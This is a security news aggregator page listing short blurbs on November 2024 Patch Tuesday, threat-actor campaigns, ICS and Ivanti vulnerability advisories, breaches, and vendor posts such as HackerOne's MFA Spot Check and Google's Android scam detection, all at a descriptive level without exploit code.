A newly patched security flaw impacting Windows NT LAN Manager (NTLM) was exploited as a zero-day by a suspected Russia-linked actor as part of cyber attacks targeting Ukraine. The vulnerability in question, CVE-2024-43451 (CVSS score: 6.5), refers to an NTLM hash disclosure spoofing vulnerability that could be exploited to steal a user''s NTLMv2 hash. It was patched by Microsoft earlier this

by The Hacker News

In this new report, learn how threat actors are leveraging cloud services to target web services with ransomware attackers. The post The State of Cloud Ransomware in 2024 appeared first on SentinelOne.

by SentinelOne

Cisco Talos discovered a new information stealing campaign operated by a Vietnamese-speaking threat actor targeting government and education entities in Europe and Asia.

by Cisco Talos Blog

Microsoft’s November Patch Tuesday includes fixes for 89 vulnerabilities in total.

by ThreatDown

By providing contextualization within the larger IT estate, AIOps ensures seamless performance, enhanced security, and operational efficiency.

by ITPro Today

Overview Cyble Research & Intelligence Labs'' (CRIL) Weekly Industrial Control System (ICS) Vulnerability Intelligence Report has highlighted multiple security vulnerabilities disclosed by the Cybersecurity and Infrastructure Security Agency (CISA).  These ICS vulnerabilities, which affect critical Industrial Control System components from Bosch Rexroth, Delta Electronics, and Beckhoff Automation, target unsuspecting users. With multiple vulnerabilities posing substantial risks to operational continuity, prompt patching and mitigation efforts are critical. CISA issued three security advisories this week, each addressing several Industrial Control System vulnerabilities with varying severity. The vulnerabilities affect products integral to manufacturing, energy, and utilities. Cyble Research & Intelligence Labs has emphasized the need to prioritize patching certain vulnerabilities due to their potential impact on operational systems and the risk of exploitation by cyber adversaries. The most concerning vulnerabilities include stack-based buffer overflow issues in Delta Electronics'' DIAScreen and a command injection vulnerability in Beckhoff Automation''s TwinCAT Control Package. If exploited, these vulnerabilities could lead to severe disruptions, including device crashes, remote code execution, and unauthorized command execution. Detailed Vulnerability Analysis The vulnerabilities identified this week are multiple products and vendors within the ICS environment.  Bosch Rexroth – Uncontrolled Resource Consumption in IndraDrive Controllers CVE-2024-48989 is a high-severity vulnerability affecting Bosch Rexroth''s AG IndraDrive FWA-INDRV*-MP* and IndraDrive Controllers. The vulnerability arises from uncontrolled resource consumption within the affected devices, which, if exploited, could lead to system instability or a denial of service (DoS) attack. To mitigate this vulnerability, it is strongly recommended that organizations immediately apply the vendor''s patch. This will minimize the risk of exploitation and ensure the continued reliability and security of the affected devices. Delta Electronics – Multiple Stack-Based Buffer Overflow Vulnerabilities in DIAScreen The vulnerabilities identified as CVE-2024-47131, CVE-2024-39605, and CVE-2024-39354 are high-severity issues affecting Delta Electronics'' DIAScreen versions prior to v1.5.0. These vulnerabilities stem from buffer overflow issues within the system, which could cause the device to crash when exploited. If successfully attacked, remote adversaries could execute arbitrary code on the compromised device, potentially leading to a complete device compromise and significant operational downtime. To mitigate the risks associated with these vulnerabilities, Delta Electronics has released patches that address the issue. Organizations using affected versions are strongly advised to upgrade to the latest software versions to protect their systems. Additionally, implementing network segmentation can help minimize the exposure of critical assets, further reducing the likelihood of successful exploitation. Beckhoff Automation – Command Injection in TwinCAT Control Package CVE-2024-8934 is a medium-severity vulnerability affecting the TwinCAT Control Package for versions prior to 1.0.603.0. This vulnerability arises from a command injection flaw, which could allow attackers to execute arbitrary commands within the system. If successfully exploited, this could compromise the underlying infrastructure, potentially impacting the security and stability of the affected systems. To address this issue, organizations should upgrade to the latest version of the TwinCAT Control Package. This will effectively mitigate the vulnerability. Additionally, to further protect against exploitation, restricting access to the affected systems through network-level controls is advisable. The vulnerabilities disclosed in this report demonstrate a concerning trend in the ICS vulnerability environment. The data from CISA reveals that a large proportion of the vulnerabilities affecting Industrial Control Systems (ICS) fall under critical or high-severity categories. Specifically, 50% of the identified vulnerabilities are classified as critical, while 30% are categorized as high severity. In contrast, medium-severity vulnerabilities account for 15% of the total, while low-severity vulnerabilities make up just 5%. This distribution underscores the increasing risks posed by ICS vulnerabilities, highlighting the critical importance of implementing robust vulnerability management strategies to address and mitigate potential threats. Recommendations for Mitigating ICS Vulnerabilities To effectively manage and mitigate the risks associated with these vulnerabilities, the following steps are recommended: Organizations should follow the guidance provided by CISA and apply patches as soon as they become available. Staying up to date with vendor updates and security advisories is critical to ensuring that vulnerabilities are addressed promptly. Segregating ICS networks from other parts of the IT infrastructure can help prevent lateral movement in case of a breach. Implementing a Zero-Trust Architecture is also advisable to limit the potential for exploitation. Regular cybersecurity training for all personnel, particularly those with access to Operational Technology (OT) systems, can help prevent human error and reduce the risk of social engineering attacks. Ongoing vulnerability scanning and penetration testing can help identify and address weaknesses before attackers exploit them. Engaging threat intelligence services and staying updated with CISA’s vulnerability intelligence reports is essential for proactive defense. Developing a robust incident response plan and conducting regular security drills ensures that organizations are prepared for a quick and coordinated response to any security incidents that may arise. Conclusion The ICS vulnerabilities highlighted by CISA demonstrate the rise of new risks targeting the industrial sector. By implementing comprehensive patch management strategies, enhancing network security, and staying informed about CISA’s vulnerability alerts, organizations can reduce their exposure to these risks and better protect their critical assets from potential exploitation. Proactive measures such as regular security audits, network segmentation, and continuous monitoring will be essential for ensuring the ongoing safety and security of Industrial Control Systems and their associated networks. The post Key Industrial Control System Vulnerabilities Identified in Recent CISA Advisories appeared first on Cyble.

by CYBLE

by ComputerWeekly

Experts expect Donald Trump’s next administration to relax cybersecurity rules on businesses, abandon concerns around human rights, and take an aggressive stance against the cyber armies of US adversaries.

by WIRED Security News

SolarWinds challenges traditional IT service management assumptions in its new report.

by ITPro Today

The FBI and CISA say they have uncovered a ""broad and significant"" China-linked cyber espionage campaign © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

As excitement builds around large language models, AI integrations in Identity Governance and Administration promise to enhance efficiency and decision-making — but only with careful planning.

by ITPro Today

Harry Coker Jr. assured critical infrastructure and private sector stakeholders that while standards are necessary, there is a need to harmonize burdensome compliance demands. 

by Cybersecurity Dive

Patch Tuesday, November 2024: CVE-2024-43451, used in real attacks, permits stealing an NTLMv2 hash with minimal interaction from the victim.

by Kaspersky

Kaspersky''s GReAT looks back on the 2024 predictions about financial and crimeware threats, and explores potential cybercrime trends for 2025.

by Securelist

The FBI and CISA warned the nation-state affiliated malicious activities are extensive and include the theft of sensitive call records and court-ordered information.

by Cybersecurity Dive

The decision is also a victory for UKG, whom the employee sued separately for privacy violation allegations stemming from a 2021 ransomware attack.

by Cybersecurity Dive

APT Wirte is doing double duty, adding all manner of supplemental malware to gain access, eavesdrop, and wipe data, depending on the target.

by Dark Reading

Uncover the risks of bias in Crown Jewels Analysis (CJA) and learn strategies to protect your organization''s most valuable assets with a comprehensive approach.

by Mitiga

Understand the Midnight Blizzard Microsoft breach by APT29, what happened, and key steps organizations should take to strengthen their defenses.

by Mitiga

See how Mitiga’s Cloud Managed Detection and Response tackles complex cyber threats with proactive threat management and advanced automation at scale.

by Mitiga

Demand for ICS pentesting and OT security is on the rise. We break down the specialist skillsets needed to keep our world running smoothly.

by Hack The Box Blog

Alan Filion, believed to have operated under the handle “Torswats,” admitted to making more than 375 fake threats against schools, places of worship, and government buildings around the United States.

by WIRED Security News

This article will guide you through the process of setting up the Amazon Bedrock integration and enabling Elastic''s prebuilt detection rules to streamline your security operations.

by Elastic Security Lab

Russia’s sabotage in Europe threatens NATO allies, targeting infrastructure to weaken Ukraine support. Explore tactics, goals, and risks.

by Recorded Future

<p>JSON Web Tokens (JWTs) are a widely used format for applications and APIs to pass authorization information. These tokens often use a JSON Web Signature (JWS) to verify that the data within the payload has not been…</p>

by TrustedSec

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Office PowerPoint. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-49032.

by Zero Day Initiative Advisories

Executive Summary Researchers from ClearSky Cyber Security has uncovered a new cyber espionage campaign attributed to TA455, a subgroup of the Iranian cyber threat actor known as Charming Kitten (also known as APT35). The cyber espionage campaign, which has been active since at least September 2023, has targeted critical industry sector entities in the aerospace, aviation, and...

by RH-ISAC

by Dark Reading

The China-affiliated group is using the highly modular DeepData framework to target organizations in South Asia.

by Dark Reading

by Dark Reading

Among the top exploited zero-day vulnerabilities were bugs found in systems from Citrix and Cisco.

by Dark Reading

by Dark Reading

The consolidation folds Cybereason''s endpoint detection and response (EDR) platform into Trustwave''s managed security services offerings, such as managed detection and response (MDR).

by Dark Reading

by Dark Reading

Temu is under investigation for a variety of misleading practices.

by Malwarebytes Labs

A threat actor affiliated with Hamas has expanded its malicious cyber operations beyond espionage to carry out disruptive attacks that exclusively target Israeli entities. The activity, linked to a group called WIRTE, has also targeted the Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt, Check Point said in an analysis. ""The [Israel-Hamas] conflict has not disrupted the WIRTE''s

by The Hacker News

Barracuda was just recognized in the CRN Edge Computing 100 as one of the 25 Hottest Edge Security Companies of 2024. Here''s what that means and how we can help you.

by Barracuda

To protect critical operations, organizations should embed identity continuity into disaster recovery plans, using failover, DR-specific policies, and identity orchestration for resilience and uninterrupted access during crises.

by ITPro Today

How HackerOne Disproved an MFA Bypass With a Spot Check Ian Melven Wed, 11/13/2024 - 12:58 Body What Is a Spot Check?A Spot Check is a powerful tool for security teams to do a tightly focused and scoped human-powered assessment with security researchers. Available as part of HackerOne Bounty and Challenge programs, Spot Checks are ideal for testing new features, critical features such as authentication and authorization, or older legacy apps and code.Why Did HackerOne Conduct a Spot Check?A threat actor posted on X indicating that they were offering to sell the details of an MFA bypass in the HackerOne platform. No additional evidence was provided.This information was picked up by an X account that publishes news in the Infosec space. While the bypass seemed unlikely, we wanted to verify the security of our MFA implementation and gain confidence via focused testing to be sure.In addition, we’re invested in using and testing our own features, including Spot Checks. HackerOne uses its own Platform to run its bug bounty program and to perform both penetration tests and phishing assessments, and Spot Checks should be no different. The HackerOne Security team is its own internal customer. Spot Check TimelineJuly 4, 2024The first report of allegations of the MFA bypass was received.Steps:Review reports: We reviewed all open and closed reports to our program involving MFA to see if the issue might have already been reported and then re-evaluated the reports for risk. Nothing was identified as a potential MFA bypass. Examine authentication logs: We examined our authentication logs for evidence of any MFA bypass.July 9, 2024The report was picked up by the media. We received some customer inquiries, which we addressed through the following response:""We''re aware of the claims of an MFA bypass in the HackerOne platform and are investigating. However, these claims remain unsubstantiated and no technical detail has been provided to HackerOne. Reports of any valid security issue in the HackerOne platform are welcome via our world-class bug bounty program. As always, we monitor for suspicious login activity and are ready to take action if it were necessary. In addition, we will be launching a HackerOne Spot Check to further fortify our MFA posture.""July 11, 2024Spot Check launched.Conducting the Spot CheckInitial RequestOur internal security team worked with the bug bounty program manager and our internal customer success manager to craft the scope and focus of the Spot Check. The initial request looked like this:""We would like the MFA authentication mechanism of the HackerOne platform deeply and thoroughly tested for any bypasses or other security issues.Security researchers can test this functionality by creating accounts on the HackerOne platform and enabling MFA on their accounts. Target: https://x.com/MonThreat/status/1808854873510662370 We are looking for any bypass of MFA where a username and password is enough to log in to an account with MFA enabled, i.e. MFA is not required. This includes the ability to determine a user''s TOTP seed or predict the required MFA code based on other available information. Please review these previous reports of issues in MFA and their evaluation and resolution to avoid reporting duplicates: (the list of previous reports was included here).”It was important to provide the existing MFA reports to the security researchers executing the Spot Check so they would know what issues had been found and how they had been triaged and resolved previously. This helped guide the researchers as to what issues were valuable to us and also helped them avoid reporting duplicate issues. Test SpecsMedium Spot Check at $1,000 each, with five security researchers for a total cost of $5,000Selected a group of top researchers experienced with finding MFA bypasses quicklyReceived submitted writeups from four researchers, each of whom spent 10-40 hours testingResultsThe Spot Check was a success and the security team is very pleased with the outcome. The detailed writeups provided confidence in the thoroughness and depth of testing authentication and, specifically, our implementation of multifactor authentication.As a result of the Spot Check, we were also very grateful to have discovered one medium-severity issue: a race condition vulnerability in our 2FA reset process. The bug was resolved and disclosed in the HackerOne Platform.The Value of Focused Testing Through Spot ChecksIf you’re looking for highly focused testing with flexible direction and specific, test-based researcher selections, yet faster and cheaper than a full-scale pentest—Spot Checks are the answer. At HackerOne, we love utilizing Spot Checks for our internal security needs, and our team is happy to discuss the best ways to implement Spot Checks for your organization. Contact our team today, or HackerOne customers can get started with a Spot Check now. Excerpt Read how HackerOne''s internal security team disproved an alleged MFA bypass with a targeted Spot Check. Main Image

by HackerOne

According to Eseye''s 2024 report, IoT adoption is expected to grow significantly across sectors, with a focus on sustainability, security, and new standards like SGP.32.

by ITPro Today

The shift to cloud means securing your organization''s digital assets requires a proactive, multilayered approach.

by Dark Reading

LastPass users can take another step toward a password-less world. Here''s how to activate the beta feature now.

by ZDNET Security

The group seeks out aerospace professionals by impersonating job recruiters — a demographic it has targeted in the past as well — then deploys the SlugResin backdoor malware.

by Dark Reading

In the ever-evolving landscape of cybersecurity, the convergence of Artificial Intelligence (AI) and Open-Source Intelligence (OSINT) has created new opportunities for risk.

by KnowBe4

Researchers at IBM X-Force are tracking a phishing campaign by the criminal threat actor “Hive0145” that’s using stolen invoice notifications to trick users into installing malware.

by KnowBe4

Spanish lawyer Andreu Van den Eynde is suing NSO Group and its founders Omri Lavie and Shalev Hulio, accusing them of illegal hacking. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The tech giant fixed privilege-escalation and model-exfiltration vulnerabilities in Vertex AI that could have allowed attackers to steal or poison custom-built AI models.

by Dark Reading

Romanian cybersecurity company Bitdefender has released a free decryptor to help victims recover data encrypted using the ShrinkLocker ransomware. The decryptor is the result of a comprehensive analysis of ShrinkLocker''s inner workings, allowing the researchers to discover a ""specific window of opportunity for data recovery immediately after the removal of protectors from BitLocker-encrypted

by The Hacker News

Three technologists in India used a homemade Faraday cage and a microwave oven to get around Apple’s location blocks.

by WIRED Security News

In response to the recently published CISA Advisory (AA24-317A) that disseminates the top routinely exploited vulnerabilities from 2023, AttackIQ has proposed a multitude of recommendations that customers can take to emulate these prevalent vulnerabilities. The post Response to CISA Advisory (AA24-317A): 2023 Top Routinely Exploited Vulnerabilities appeared first on AttackIQ.

by AttackIQ

Prior to last week’s US Presidential Election, the Trustwave SpiderLabs team was hard at work investigating potential risks and threats to the election system, from disinformation campaigns to nation-state actors looking to exploit vulnerabilities.

by SpiderLabs Blog

Learning from cyber-incidents and sharing best practices to prevent incident recurrence.

by Kaspersky

We tested the best VPNs to find the best options for travel. They offer solid and reliable server networks, strong security, and excellent streaming capabilities to preserve your privacy on your next trip away.

by ZDNET Security

Fourteen product families affected as 2024 passes an unfortunate milestone

by Sophos News

The rise of SaaS and cloud-based work environments has fundamentally altered the cyber risk landscape. With more than 90% of organizational network traffic flowing through browsers and web applications, companies are facing new and serious cybersecurity threats. These include phishing attacks, data leakage, and malicious extensions. As a result, the browser also becomes a vulnerability that

by The Hacker News

Black Duck® announced today that it has been recognised as a leader in The Forrester Wave™: Software Composition Analysis, Q4 2024. This comprehensive report highlights the 10 most significant vendors in the Software Composition Analysis (SCA) market, assessing them on 25 criteria within two main categories: current offerings and strategic direction. Black Duck achieved the […] The post Black Duck Honoured as a Leading Provider in Software Composition Analysis by Top Research Firm appeared first on IT Security Guru.

by IT Security Guru

Millions of customers of Hot Topic have been informed that their personal data was compromised during an October data breach at the American retailer. Have I Been Pwned (HIBP), the breach notification service, said this week that it alerted 57 million Hot Topic customers that their data had been compromised. The stolen data includes email […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The Praetorian team recently discovered a new vulnerability in Ivanti Endpoint Manager (EPM) which serves as a reminder to be aware of legacy systems - patch regularly and test often. The post Skeletons in the Closet: Legacy Software, Novel Exploits appeared first on Praetorian.

by Praetorian

In order to improve cybersecurity through cyber insurance, the private sector should aggregate cyber incident data to inform risk models and in turn, more accurately price cyber premiums. The post The Role of Data in Improving Cyber Insurance Pricing appeared first on DFRLab.

by DFRLab

CISOs understand the risk scenarios that can help create safeguards so everyone can use AI safely and focus on the technology''s promises and opportunities.

by Dark Reading

Adversaries often use complex, multi-stage cloud attacks that evade traditional security measures, which struggle to fully visualize, prioritize, and respond... The post Top challenges for implementing multi-domain correlation in the cloud appeared first on Sysdig.

by Sysdig

A security analysis of the OvrC cloud platform has uncovered 10 vulnerabilities that could be chained to allow potential attackers to execute code remotely on connected devices. ""Attackers successfully exploiting these vulnerabilities can access, control, and disrupt devices supported by OvrC; some of those include smart electrical power supplies, cameras, routers, home automation systems, and

by The Hacker News

Nation-state adversaries are changing their approach, pivoting from data destruction to prioritizing stealth and espionage. According to the Microsoft 2023 Digital Defense Report, “nation-state attackers are increasing their investments and launching more sophisticated cyberattacks to evade detection and achieve strategic priorities.” These actors pose a critical threat to United States infrastructure and protected data, and […] The post Adversarial advantage: Using nation-state threat analysis to strengthen U.S. cybersecurity appeared first on Security Intelligence.

by Security Intelligence

Where there’s a gift to be bought, there’s also a scammer out to make money. Here''s how to stay safe this shopping season.

by Malwarebytes Labs

A new "multilevel leader review" can take weeks and has prompted concerns that affected corporate workers will give up and quit.

by ITPro Today

Posted by Lyubov Farafonova, Product Manager and Steve Kafka, Group Product Manager, Android User safety is at the heart of everything we do at Google. Our mission to make technology helpful for everyone means building features that protect you while keeping your privacy top of mind. From Gmail’s defenses that stop more than 99.9% of spam, phishing and malware, to Google Messages’ advanced security that protects users from 2 billion suspicious messages a month and beyond, we''re constantly developing and expanding protection features that help keep you safe. We''re introducing two new real-time protection features that enhance your safety, all while safeguarding your privacy: Scam Detection in Phone by Google to protect you from scams and fraud, and Google Play Protect live threat detection with real-time alerts to protect you from malware and dangerous apps. These new security features are available first on Pixel, and are coming soon to more Android devices. More intelligent AI-powered protection against scams Scammers steal over $1 trillion dollars a year from people, and phone calls are their favorite way to do it. Even more alarming, scam calls are evolving, becoming increasingly more sophisticated, damaging and harder to identify. That’s why we’re using the best of Google AI to identify and stop scams before they can do harm with Scam Detection. Real-time protection, built with your privacy in mind. Real-time defense, right on your device: Scam Detection uses powerful on-device AI to notify you of a potential scam call happening in real-time by detecting conversation patterns commonly associated with scams. For example, if a caller claims to be from your bank and asks you to urgently transfer funds due to an alleged account breach, Scam Detection will process the call to determine whether the call is likely spam and, if so, can provide an audio and haptic alert and visual warning that the call may be a scam. Private by design, you’re always in control: We’ve built Scam Detection to protect your privacy and ensure you’re always in control of your data. Scam Detection is off by default, and you can decide whether you want to activate it for future calls. At any time, you can turn it off for all calls in the Phone app Settings, or during a particular call. The AI detection model and processing are fully on-device, which means that no conversation audio or transcription is stored on the device, sent to Google servers or anywhere else, or retrievable after the call. Cutting-edge AI protection, now on more Pixel phones: Gemini Nano, our advanced on-device AI model, powers Scam Detection on Pixel 9 series devices. As part of our commitment to bring powerful AI features to even more devices, this AI-powered protection is available to Pixel 6+ users thanks to other robust Google on-device machine learning models. We’re now rolling out Scam Detection to English-speaking Phone by Google public beta users in the U.S. with a Pixel 6 or newer device. To provide feedback on your experience, please click on Phone by Google App -> Menu -> Help & Feedback -> Send Feedback. We look forward to learning from this beta and your feedback, and we’ll share more about Scam Detection in the months ahead. More real-time alerts to protect you from bad apps Google Play Protect works non-stop to protect you in real-time from malware and unsafe apps. Play Protect analyzes behavioral signals related to the use of sensitive permissions and interactions with other apps and services.With live threat detection, if a harmful app is found, you''ll now receive a real-time alert, allowing you to take immediate action to protect your device. By looking at actual activity patterns of apps, live threat detection can now find malicious apps that try extra hard to hide their behavior or lie dormant for a time before engaging in suspicious activity. At launch, live threat detection will focus on stalkerware, code that may collect personal or sensitive data for monitoring purposes without user consent, and we will explore expanding its detection to other types of harmful apps in the future. All of this protection happens on your device in a privacy preserving way through Private Compute Core, which allows us to protect users without collecting data. Live threat detection with real-time alerts in Google Play Protect are now available on Pixel 6+ devices and will be coming to additional phone makers in the coming months.

by Google Security Blog

The Iranian threat actor known as TA455 has been observed taking a leaf out of a North Korean hacking group''s playbook to orchestrate its own version of the Dream Job campaign targeting the aerospace industry by offering fake jobs since at least September 2023. ""The campaign distributed the SnailResin malware, which activates the SlugResin backdoor,"" Israeli cybersecurity company ClearSky said

by The Hacker News

Microsoft on Tuesday revealed that two security flaws impacting Windows NT LAN Manager (NTLM) and Task Scheduler have come under active exploitation in the wild. The security vulnerabilities are among the 90 security bugs the tech giant addressed as part of its Patch Tuesday update for November 2024. Of the 90 flaws, four are rated Critical, 85 are rated Important, and one is rated Moderate in

by The Hacker News

This week, KnowBe4, the provider of security awareness training and simulated phishing platform, announced the release of its new 2024 Holiday Resource Kit, designed to strengthen users’ cyber defences during the festive season. This year’s kit builds on the success of previous versions, offering a selection of new and improved resources to address the latest […] The post KnowBe4 Releases 2024 Holiday Kit to Boost Cyber Resilience appeared first on IT Security Guru.

by IT Security Guru

With Linux systems increasingly under threat, this guide outlines essential security practices to harden Linux servers.

by ITPro Today

US Immigration and Customs Enforcement put out a fresh call for contracts for surveillance technologies before an anticipated surge in the number of people it monitors ahead of deportation hearings.

by WIRED Security News

This blog shares the definition of mishing, common tactics used, and the growing threat for organizations. The post Mishing: The Rising Mobile Attack Vector Facing Every Organization appeared first on Zimperium.

by Zimperium

by ComputerWeekly

We discuss North Korea''s use of IT workers to infiltrate companies, detailing detection strategies like IT asset management and IP analysis to counter this. The post Global Companies Are Unknowingly Paying North Koreans: Here’s How to Catch Them appeared first on Unit 42.

by Palo Alto Networks - Unit42

Security researchers at watchTowr discovered the flaw and claim attackers can gain access without authentication, a finding which Citrix disputes.

by Cybersecurity Dive

If you need to add encryption or digital signing to the Thunderbird email app (or other supporting apps) on Android, there''s one clear and easy route to success.

by ZDNET Security

Internet-exposed GNSS receivers pose a significant threat to sensitive operations. Kaspersky shares statistics on internet-exposed receivers for July 2024 and advice on how to protect against GNSS attacks.

by Securelist

The ability to share secure links for video calls is just one of the privacy-focused messaging app''s new features.

by ZDNET Security

by ComputerWeekly

by ComputerWeekly

The top five vulnerabilities exploited by attackers last year were found in security gear from Citrix, Cisco and Fortinet, the Five Eyes’ cyber agencies found.

by Cybersecurity Dive

Despite having only a scant focus on cybersecurity regulations a decade ago, countries in the Middle East — led by Saudi Arabia and other Gulf nations — have adopted mature frameworks and regulations amid escalating volumes of attacks.

by Dark Reading

<p>Update November 12, 2024 - This vulnerability has been patched. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019This post was originally published on October 8, 2024. TL;DR - Using built-in default…</p>

by TrustedSec

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2024-50330.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-50329.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-50328.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-50327.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-50326.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-50324.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-50323.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-50322.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-37376.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-34787.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-34784.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-34782.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-34781.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-34781.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32847.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32844.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32841.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32839.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-50321.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-50320.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-50319.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-50318.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-50317.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to escalate privileges on affected installations of Ivanti Secure Access Client. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-7571.

by Zero Day Initiative Advisories

🕵️📱 Mysterious iPhone reboots, Tor under attack, Citrix Unauth RCE (@SinSinology), GitHub Actions attack (@adnanthekhan), and more!

by Bad Sector Labs

The Patch Tuesday for November of 2024 includes 91 vulnerabilities, including two that Microsoft marked as “critical.” The remaining 89 vulnerabilities listed are classified as “important.”

by Cisco Talos Blog

The November 2024 Patch Tuesday update contains a substantially high percentage of remote code execution (RCE) vulnerabilities (including a critical issue in Windows Kerberos), and two other zero-day bugs that have been previously disclosed and could soon come under attack.

by Dark Reading

The data leak was not actually due to a breach in Amazon''s systems but rather that of a third-party vendor; the supply chain incident affected several other clients as well.

by Dark Reading

OWASP is looking for cybersecurity professionals to volunteer on AI security projects.

by Barracuda

Microsoft today released updates to plug at least 89 security holes in its Windows operating systems and other software. November''s patch batch includes fixes for two zero-day vulnerabilities that are already being exploited by attackers, as well as two other flaws that were publicly disclosed prior to today.

by Krebs on Security

The essays are to focus on the impact that artificial intelligence will have on European policy.

by Dark Reading

A new report from ESET has found that most nation-state threat actors rely on spear phishing as a primary initial access technique.

by KnowBe4

Learn how to step-by-step create your first realistic deepfake video in a few minutes.

by KnowBe4

Life-changing purchases under $100, Common Detection & Evasion Techniques for WAFs, Aaron Swartz Day 2024, From failing 22 times to building a $2.5B Company, and more...

by Hive Five

Adaptive Shield is the third security posture management provider the company has acquired in the past 14 months as identity-based attacks continue to rise.

by Dark Reading

Cybersecurity researchers have disclosed new security flaws impacting Citrix Virtual Apps and Desktop that could be exploited to achieve unauthenticated remote code execution (RCE) The issue, per findings from watchTowr, is rooted in the Session Recording component that allows system administrators to capture user activity, and record keyboard and mouse input, along with a video stream of the

